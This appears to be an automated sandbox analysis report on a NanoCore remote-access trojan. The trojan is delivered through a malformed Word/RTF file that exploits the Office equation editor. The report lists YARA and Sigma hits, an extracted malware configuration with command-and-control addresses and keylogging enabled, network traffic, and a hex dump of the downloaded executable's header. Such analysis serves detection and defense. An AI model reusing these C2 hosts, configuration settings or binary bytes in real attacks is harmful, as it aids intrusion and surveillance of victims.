9.2.RegSvcs.exe.5b0000.5.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
9.2.RegSvcs.exe.26f171c.20.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0x9a13:$x1: NanoCore.ClientPluginHost 0x19c3d:$x1: NanoCore.ClientPluginHost 0x26daf:$x1: NanoCore.ClientPluginHost 0x2d305:$x1: NanoCore.ClientPluginHost 0x332e0:$x1: NanoCore.ClientPluginHost 0x3cd53:$x1: NanoCore.ClientPluginHost 0x47187:$x1: NanoCore.ClientPluginHost 0x52171:$x1: NanoCore.ClientPluginHost 0x5df1f:$x1: NanoCore.ClientPluginHost 0x69cae:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost 0x9a3d:$x2: IClientNetworkHost 0x19c6a:$x2: IClientNetworkHost 0x26de8:$x2: IClientNetworkHost 0x2d33e:$x2: IClientNetworkHost 0x3ceb0:$x2: IClientNetworkHost 0x471c0:$x2: IClientNetworkHost 0x5218b:$x2: IClientNetworkHost 0x5df39:$x2: IClientNetworkHost 0x69ceb:$x2: IClientNetworkHost
9.2.RegSvcs.exe.26f171c.20.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x99ee:$a: NanoCore 0x9a13:$a: NanoCore 0x9a6c:$a: NanoCore 0x19c17:$a: NanoCore 0x19c3d:$a: NanoCore 0x19c99:$a: NanoCore 0x26af7:$a: NanoCore 0x26b50:$a: NanoCore 0x26b83:$a: NanoCore 0x26daf:$a: NanoCore 0x26e2b:$a: NanoCore 0x27444:$a: NanoCore 0x2758d:$a: NanoCore 0x27a61:$a: NanoCore 0x27d48:$a: NanoCore 0x27d5f:$a: NanoCore 0x2d305:$a: NanoCore
9.2.RegSvcs.exe.2280000.19.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x41ee:$x1: NanoCore.ClientPluginHost 0x422b:$x2: IClientNetworkHost
9.2.RegSvcs.exe.2280000.19.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x41ee:$x2: NanoCore.ClientPluginHost 0x7641:$s4: PipeCreated 0x4218:$s5: IClientLoggingHost
9.2.RegSvcs.exe.2250000.18.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1d3db:$x1: NanoCore.ClientPluginHost 0x1d3f5:$x2: IClientNetworkHost
9.2.RegSvcs.exe.2250000.18.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1d3db:$x2: NanoCore.ClientPluginHost 0x20718:$s4: PipeCreated 0x1d3c8:$s5: IClientLoggingHost
9.2.RegSvcs.exe.780000.9.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3deb:$x1: NanoCore.ClientPluginHost 0x3f48:$x2: IClientNetworkHost
9.2.RegSvcs.exe.780000.9.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3deb:$x2: NanoCore.ClientPluginHost 0x4d41:$s3: PipeExists 0x3fe1:$s4: PipeCreated 0x3e05:$s5: IClientLoggingHost
9.2.RegSvcs.exe.890000.10.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x39eb:$x1: NanoCore.ClientPluginHost 0x3a24:$x2: IClientNetworkHost
9.2.RegSvcs.exe.890000.10.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x39eb:$x2: NanoCore.ClientPluginHost 0x3b36:$s4: PipeCreated 0x3a05:$s5: IClientLoggingHost
9.2.RegSvcs.exe.4a0000.2.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0xe75:$x1: NanoCore.ClientPluginHost 0xe8f:$x2: IClientNetworkHost
9.2.RegSvcs.exe.4a0000.2.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0xe75:$x2: NanoCore.ClientPluginHost 0x1261:$s3: PipeExists 0x1136:$s4: PipeCreated 0xeb0:$s5: IClientLoggingHost
9.2.RegSvcs.exe.910000.12.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x350b:$x1: NanoCore.ClientPluginHost 0x3525:$x2: IClientNetworkHost
9.2.RegSvcs.exe.910000.12.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x350b:$x2: NanoCore.ClientPluginHost 0x52b6:$s4: PipeCreated 0x34f8:$s5: IClientLoggingHost
9.2.RegSvcs.exe.8a0000.11.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x3d99:$x1: NanoCore.ClientPluginHost 0x3db3:$x2: IClientNetworkHost
9.2.RegSvcs.exe.8a0000.11.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x3d99:$x2: NanoCore.ClientPluginHost 0x4dce:$s4: PipeCreated 0x3d86:$s5: IClientLoggingHost
9.2.RegSvcs.exe.26f6574.21.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
9.2.RegSvcs.exe.26f6574.21.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
9.2.RegSvcs.exe.2254c9f.16.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1a53c:$x1: NanoCore.ClientPluginHost 0x1a556:$x2: IClientNetworkHost
9.2.RegSvcs.exe.2254c9f.16.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1a53c:$x2: NanoCore.ClientPluginHost 0x1d879:$s4: PipeCreated 0x1a529:$s5: IClientLoggingHost
9.2.RegSvcs.exe.910000.12.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x170b:$x1: NanoCore.ClientPluginHost 0x1725:$x2: IClientNetworkHost
9.2.RegSvcs.exe.910000.12.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x170b:$x2: NanoCore.ClientPluginHost 0x34b6:$s4: PipeCreated 0x16f8:$s5: IClientLoggingHost
9.2.RegSvcs.exe.5a0000.4.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x2dbb:$x1: NanoCore.ClientPluginHost 0x2de5:$x2: IClientNetworkHost
9.2.RegSvcs.exe.5a0000.4.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x2dbb:$x2: NanoCore.ClientPluginHost 0x4c6b:$s4: PipeCreated
9.2.RegSvcs.exe.770000.8.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x13a8:$x1: NanoCore.ClientPluginHost
9.2.RegSvcs.exe.770000.8.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x13a8:$x2: NanoCore.ClientPluginHost 0x1486:$s4: PipeCreated 0x13c2:$s5: IClientLoggingHost
6.2.vbc.exe.3b30110.4.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1018d:$x1: NanoCore.ClientPluginHost 0x951ad:$x1: NanoCore.ClientPluginHost 0x101ca:$x2: IClientNetworkHost 0x951ea:$x2: IClientNetworkHost 0x13cfd:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe 0x98d1d:$x3: #=qjgz7ljmpp0J7FvL9dmi8ctJILdgtcbw8JYUc6GC8MeJ9B11Crfg2Djxcf0p8PZGe
6.2.vbc.exe.3b30110.4.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
6.2.vbc.exe.3b30110.4.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xfef5:$a: NanoCore 0xff05:$a: NanoCore 0x10139:$a: NanoCore 0x1014d:$a: NanoCore 0x1018d:$a: NanoCore 0x94f15:$a: NanoCore 0x94f25:$a: NanoCore 0x95159:$a: NanoCore 0x9516d:$a: NanoCore 0x951ad:$a: NanoCore 0xff54:$b: ClientPlugin 0x10156:$b: ClientPlugin 0x10196:$b: ClientPlugin 0x94f74:$b: ClientPlugin 0x95176:$b: ClientPlugin 0x951b6:$b: ClientPlugin 0x1007b:$c: ProjectData 0x9509b:$c: ProjectData 0x10a82:$d: DESCrypto 0x95aa2:$d: DESCrypto 0x1844e:$e: KeepAlive
9.2.RegSvcs.exe.890000.10.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1deb:$x1: NanoCore.ClientPluginHost 0x1e24:$x2: IClientNetworkHost
9.2.RegSvcs.exe.890000.10.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1deb:$x2: NanoCore.ClientPluginHost 0x1f36:$s4: PipeCreated 0x1e05:$s5: IClientLoggingHost
9.2.RegSvcs.exe.2250000.18.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x1f1db:$x1: NanoCore.ClientPluginHost 0x1f1f5:$x2: IClientNetworkHost
9.2.RegSvcs.exe.2250000.18.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x1f1db:$x2: NanoCore.ClientPluginHost 0x22518:$s4: PipeCreated 0x1f1c8:$s5: IClientLoggingHost
9.2.RegSvcs.exe.225e8a4.17.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x10937:$x1: NanoCore.ClientPluginHost 0x10951:$x2: IClientNetworkHost
9.2.RegSvcs.exe.225e8a4.17.raw.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x10937:$x2: NanoCore.ClientPluginHost 0x13c74:$s4: PipeCreated 0x10924:$s5: IClientLoggingHost
9.2.RegSvcs.exe.27027b4.22.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x6da5:$x1: NanoCore.ClientPluginHost 0x6dd2:$x2: IClientNetworkHost
9.2.RegSvcs.exe.27027b4.22.unpack	Nanocore_RAT_Feb18_1	Detects Nanocore RAT	Florian Roth	0x6da5:$x2: NanoCore.ClientPluginHost 0x7d74:$s2: FileCommand 0xc776:$s4: PipeCreated 0x6dbf:$s5: IClientLoggingHost
9.2.RegSvcs.exe.3824d52.23.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14dd7:$x1: NanoCore.ClientPluginHost 0x21f40:$x1: NanoCore.ClientPluginHost 0x2848e:$x1: NanoCore.ClientPluginHost 0x2e45f:$x1: NanoCore.ClientPluginHost 0x37ecb:$x1: NanoCore.ClientPluginHost 0x422f6:$x1: NanoCore.ClientPluginHost 0x4d2d3:$x1: NanoCore.ClientPluginHost 0x59075:$x1: NanoCore.ClientPluginHost 0x6e54d:$x1: NanoCore.ClientPluginHost 0x967af:$x1: NanoCore.ClientPluginHost 0xa5bef:$x1: NanoCore.ClientPluginHost 0xbda7b:$x1: NanoCore.ClientPluginHost 0xe5cc9:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e04:$x2: IClientNetworkHost 0x21f79:$x2: IClientNetworkHost 0x284c7:$x2: IClientNetworkHost 0x38028:$x2: IClientNetworkHost 0x4232f:$x2: IClientNetworkHost 0x4d2ed:$x2: IClientNetworkHost
9.2.RegSvcs.exe.3824d52.23.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.RegSvcs.exe.3824d52.23.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14db1:$a: NanoCore 0x14dd7:$a: NanoCore 0x14e33:$a: NanoCore 0x21c88:$a: NanoCore 0x21ce1:$a: NanoCore 0x21d14:$a: NanoCore 0x21f40:$a: NanoCore 0x21fbc:$a: NanoCore 0x225d5:$a: NanoCore 0x2271e:$a: NanoCore 0x22bf2:$a: NanoCore 0x22ed9:$a: NanoCore 0x22ef0:$a: NanoCore 0x2848e:$a: NanoCore 0x28508:$a: NanoCore 0x2d0a5:$a: NanoCore 0x2e45f:$a: NanoCore 0x2e4a9:$a: NanoCore
9.2.RegSvcs.exe.27027b4.22.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x8ba5:$x1: NanoCore.ClientPluginHost 0x15d17:$x1: NanoCore.ClientPluginHost 0x1c26d:$x1: NanoCore.ClientPluginHost 0x22248:$x1: NanoCore.ClientPluginHost 0x2bcbb:$x1: NanoCore.ClientPluginHost 0x360ef:$x1: NanoCore.ClientPluginHost 0x410d9:$x1: NanoCore.ClientPluginHost 0x4ce87:$x1: NanoCore.ClientPluginHost 0x58c16:$x1: NanoCore.ClientPluginHost 0x8bd2:$x2: IClientNetworkHost 0x15d50:$x2: IClientNetworkHost 0x1c2a6:$x2: IClientNetworkHost 0x2be18:$x2: IClientNetworkHost 0x36128:$x2: IClientNetworkHost 0x410f3:$x2: IClientNetworkHost 0x4cea1:$x2: IClientNetworkHost 0x58c53:$x2: IClientNetworkHost
9.2.RegSvcs.exe.27027b4.22.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x8b7f:$a: NanoCore 0x8ba5:$a: NanoCore 0x8c01:$a: NanoCore 0x15a5f:$a: NanoCore 0x15ab8:$a: NanoCore 0x15aeb:$a: NanoCore 0x15d17:$a: NanoCore 0x15d93:$a: NanoCore 0x163ac:$a: NanoCore 0x164f5:$a: NanoCore 0x169c9:$a: NanoCore 0x16cb0:$a: NanoCore 0x16cc7:$a: NanoCore 0x1c26d:$a: NanoCore 0x1c2e7:$a: NanoCore 0x22248:$a: NanoCore 0x22292:$a: NanoCore 0x22eec:$a: NanoCore 0x2bcbb:$a: NanoCore 0x2bda5:$a: NanoCore 0x2cc1c:$a: NanoCore
9.2.RegSvcs.exe.26f6574.21.raw.unpack	Nanocore_RAT_Gen_2	Detetcs the Nanocore RAT	Florian Roth	0x4bbb:$x1: NanoCore.ClientPluginHost 0x14de5:$x1: NanoCore.ClientPluginHost 0x21f57:$x1: NanoCore.ClientPluginHost 0x284ad:$x1: NanoCore.ClientPluginHost 0x2e488:$x1: NanoCore.ClientPluginHost 0x37efb:$x1: NanoCore.ClientPluginHost 0x4232f:$x1: NanoCore.ClientPluginHost 0x4d319:$x1: NanoCore.ClientPluginHost 0x590c7:$x1: NanoCore.ClientPluginHost 0x64e56:$x1: NanoCore.ClientPluginHost 0x4be5:$x2: IClientNetworkHost 0x14e12:$x2: IClientNetworkHost 0x21f90:$x2: IClientNetworkHost 0x284e6:$x2: IClientNetworkHost 0x38058:$x2: IClientNetworkHost 0x42368:$x2: IClientNetworkHost 0x4d333:$x2: IClientNetworkHost 0x590e1:$x2: IClientNetworkHost 0x64e93:$x2: IClientNetworkHost
9.2.RegSvcs.exe.26f6574.21.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0x4b96:$a: NanoCore 0x4bbb:$a: NanoCore 0x4c14:$a: NanoCore 0x14dbf:$a: NanoCore 0x14de5:$a: NanoCore 0x14e41:$a: NanoCore 0x21c9f:$a: NanoCore 0x21cf8:$a: NanoCore 0x21d2b:$a: NanoCore 0x21f57:$a: NanoCore 0x21fd3:$a: NanoCore 0x225ec:$a: NanoCore 0x22735:$a: NanoCore 0x22c09:$a: NanoCore 0x22ef0:$a: NanoCore 0x22f07:$a: NanoCore 0x284ad:$a: NanoCore 0x28527:$a: NanoCore 0x2e488:$a: NanoCore 0x2e4d2:$a: NanoCore 0x2f12c:$a: NanoCore
9.2.RegSvcs.exe.381ff26.25.raw.unpack	JoeSecurity_Nanocore	Yara detected Nanocore RAT	Joe Security
9.2.RegSvcs.exe.381ff26.25.raw.unpack	NanoCore	unknown	Kevin Breen <kevin@techanarchy.net>	0xddf:$a: NanoCore 0xe38:$a: NanoCore 0xe75:$a: NanoCore 0xeee:$a: NanoCore 0x99c2:$a: NanoCore 0x99e7:$a: NanoCore 0x9a40:$a: NanoCore 0x19bdd:$a: NanoCore 0x19c03:$a: NanoCore 0x19c5f:$a: NanoCore 0x26ab4:$a: NanoCore 0x26b0d:$a: NanoCore 0x26b40:$a: NanoCore 0x26d6c:$a: NanoCore 0x26de8:$a: NanoCore 0x27401:$a: NanoCore 0x2754a:$a: NanoCore 0x27a1e:$a: NanoCore 0x27d05:$a: NanoCore 0x27d1c:$a: NanoCore 0x2d2ba:$a: NanoCore
Click to see the 83 entries

Sigma Overview

System Summary:

Sigma detected: File Dropped By EQNEDT32EXE

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 2904, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe

Sigma detected: NanoCore

Show sources

Source: File created

Author: Joe Security: Data: EventID: 11, Image: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe, ProcessId: 2988, TargetFilename: C:\Users\user\AppData\Roaming\EA860E7A-A87F-4A88-92EF-38F744458171\run.dat

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Antivirus detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\v[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\3B75759.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed

Found malware configuration

Show sources

Source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack

Malware Configuration Extractor: NanoCore {"Version": "1.2.2.0", "Mutex": "21f4355e-8257-4e77-8f1b-c822c6ea", "Group": "BUILD", "Domain1": "79.134.225.26", "Domain2": "nassiru1166main.ddns.net", "Port": 1133, "KeyboardLogging": "Enable", "RunOnStartup": "Disable", "RequestElevation": "Disable", "BypassUAC": "Disable", "ClearZoneIdentifier": "Enable", "ClearAccessControl": "Disable", "SetCriticalProcess": "Disable", "PreventSystemSleep": "Enable", "ActivateAwayMode": "Disable", "EnableDebugMode": "Disable", "RunDelay": 0, "ConnectDelay": 4000, "RestartDelay": 5000, "TimeoutInterval": 5000, "KeepAliveTimeout": 30000, "MutexTimeout": 5000, "LanTimeout": 2500, "WanTimeout": 8000, "BufferSize": "ffff0000", "MaxPacketSize": "0000a000", "GCThreshold": "0000a000", "UseCustomDNS": "Enable", "PrimaryDNSServer": "8.8.8.8", "BackupDNSServer": "8.8.4.4"}

Multi AV Scanner detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\vbc[1].exe	ReversingLabs: Detection: 23%
Source: C:\Users\Public\vbc.exe	ReversingLabs: Detection: 23%

Yara detected Nanocore RAT

Show sources

Source: Yara match	File source: 00000009.00000002.2388271051.0000000000402000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2389656578.000000000380F000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2388723770.00000000009A0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.2133442935.00000000038A1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 2988, type: MEMORY
Source: Yara match	File source: 9.2.RegSvcs.exe.3830f84.24.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a0000.14.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.3b30110.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a0000.14.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.9a4629.13.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.vbc.exe.3b30110.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.3824d52.23.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.RegSvcs.exe.381ff26.25.raw.unpack, type: UNPACKEDPE

Source: 9.2.RegSvcs.exe.9a0000.14.unpack	Avira: Label: TR/NanoCore.fadte
Source: 9.2.RegSvcs.exe.400000.1.unpack	Avira: Label: TR/Dropper.Gen

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)

Show sources

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Process created: C:\Users\Public\vbc.exe

Source: unknown

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding

Source: unknown	HTTPS traffic detected: 104.22.1.232:443 -> 192.168.2.22:49166 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49167 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: unknown	HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49171 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Source: unknown

HTTPS traffic detected: 172.67.8.238:443 -> 192.168.2.22:49165 version: TLS 1.2

Source:	Binary string: ystem.pdb source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source:	Binary string: Rbvcs.pdbs~ source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source:	Binary string: pC:\Windows\System.pdb source: RegSvcs.exe, 00000009.00000002.2390017594.0000000004D9C000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Downloads\NanoCoreSwiss\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source:	Binary string: C:\Users\Liam\Documents\Visual Studio 2013\Projects\NanoCoreStressTester\NanoCoreStressTester\obj\Debug\NanoCoreStressTester.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source:	Binary string: G:\Users\Andy\Documents\Visual Studio 2013\Projects\NanocoreBasicPlugin\NanoCoreBase\obj\Debug\NanoCoreBase.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source:	Binary string: indows\System.pdbpdbtem.pdb source: RegSvcs.exe, 00000009.00000002.2389919111.000000000473D000.00000004.00000001.sdmp
Source:	Binary string: System.pdbX source: RegSvcs.exe, 00000009.00000002.2388951681.0000000002296000.00000004.00000040.sdmp
Source:	Binary string: P:\Visual Studio Projects\Projects 15\NanoNana\MyClientPlugin\obj\Debug\MyClientPlugin.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp
Source:	Binary string: mscorrc.pdb source: vbc.exe, 00000006.00000002.2131108315.0000000000E70000.00000002.00000001.sdmp, RegSvcs.exe, 00000009.00000002.2388359155.0000000000540000.00000002.00000001.sdmp
Source:	Binary string: C:\Users\Cole\Documents\Visual Studio 2013\Projects\FileBrowserPlugin\FileBrowserClient\obj\Debug\FileBrowserClient.pdb source: RegSvcs.exe, 00000009.00000002.2389242558.00000000026E1000.00000004.00000001.sdmp

Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegSvcs.exe

Code function: 4x nop then mov esp, ebp

Source: global traffic

DNS query: name: cutt.ly

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443

Source: global traffic

TCP traffic: 192.168.2.22:49165 -> 172.67.8.238:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49169 -> 172.67.8.238:80
Source: Traffic	Snort IDS: 1042 WEB-IIS view source via translate header 192.168.2.22:49170 -> 172.67.8.238:80
Source: Traffic	Snort IDS: 3132 WEB-CLIENT PNG large image width download attempt 172.245.45.28:80 -> 192.168.2.22:49175

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor	URLs: 79.134.225.26
Source: Malware configuration extractor	URLs: nassiru1166main.ddns.net

Uses dynamic DNS services

Show sources

Source: unknown

DNS query: name: nassiru1166main.ddns.net

Source: global traffic

TCP traffic: 192.168.2.22:49176 -> 79.134.225.26:1133

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Mon, 03 May 2021 12:31:02 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/8.0.3Last-Modified: Mon, 03 May 2021 07:22:11 GMTETag: "116c00-5c167d1eb0284"Accept-Ranges: bytesContent-Length: 1141760Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 a3 a4 8f 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 50 00 00 58 11 00 00 12 00 00 00 00 00 00 92 77 11 00 00 20 00 00 00 80 11 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 c0 11 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 40 77 11 00 4f 00 00 00 00 80 11 00 d0 0e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 a0 11 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 98 57 11 00 00 20 00 00 00 58 11 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 d0 0e 00 00 00 80 11 00 00 10 00 00 00 5a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 a0 11 00 00 02 00 00 00 6a 11 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 74 77 11 00 00 00 00 00 48 00 00 00 02 00 05 00 04 84 00 00 3c 99 00 00 03 00 00 00 01 00 00 06 40 1d 01 00 00 5a 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1b 30 02 00 1f 00 00 00 00 00 00 00 00 00 28 20 00 00 0a 28 21 00 00 0a 00 de 02 00 dc 00 28 07 00 00 06 02 6f 22 00 00 0a 00 2a 00 01 10 00 00 02 00 01 00 0e 0f 00 02 00 00 00 00 aa 00 02 16 28 23 00 00 0a 00 02 16 28 24 00 00 0a 00 02 17 28 25 00 00 0a 00 02 17 28 26 00 00 0a 00 02 16 28 27 00 00 0a 00 2a 4e 00 02 28 09 00 00 06 6f 60 01 00 06 28 28 00 00 0a 00 2a 26 00 02 28 29 00 00 0a 00 2a ce 73 2a 00 00 0a 80 01 00 00 04 73 2b 00 00 0a 80 02 00 00 04 73 2c 00 00 0a 80 03 00 00 04 73 2d 00 00 0a 80 04 00 00 04 73 2e 00 00 0a 80 05 00 00 04 2a 00 00 00 13 30 01 00 10 00 00 00 01 00 00 11 00 7e 01 00 00 04 6f 2f 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 02 00 00 11 00 7e 02 00 00 04 6f 30 00 00 0a 0a 2b 00 06 2a 13 30 01 00 10 00 00 00 03 00 00 11 00 7e 03 00 00 04 6f 31 00 00 0a 0a 2b 00 06 